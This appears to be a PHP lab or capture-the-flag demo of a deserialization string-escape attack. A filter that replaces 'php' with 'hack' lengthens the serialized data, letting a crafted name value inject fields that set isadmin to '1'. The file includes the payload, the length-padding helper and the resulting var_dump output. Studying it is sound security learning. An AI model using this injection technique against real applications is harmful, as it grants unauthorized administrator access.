object(a)#1 (3) { ["name"]=> string(196) "hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack" ["number"]=> string(4) "1234" ["isadmin"]=> string(1) "1" }


<?php

// 目标将isadmin改为'1'

// 吐出单个字符

// class a{

//     public $name='phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:6:"number";s:4:"1234";s:7:"isadmin";s:1:"1";}';

//     public $number='1234';

//     public $isadmin='0';

// }

// $data=serialize(new a());

// $data=str_replace("php","hack",$data);

// var_dump(unserialize($data));



// 吐出多个字符

class a{

    public $name='phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:6:"number";s:4:"1234";s:7:"isadmin";s:1:"1";}';

    public $number='1234';

    public $isadmin='0';

}

$data=serialize(new a());

$data=str_replace("php","hack",$data);

var_dump(unserialize($data));



// echo strlen('";s:6:"number";s:4:"1234";s:7:"isadmin";s:1:"1";}');

// $a='';

// for($i=1;$i<=49;$i++){

//  $a=$a.'php';

// }

// echo $a;

highlight_file(__FILE__);

?>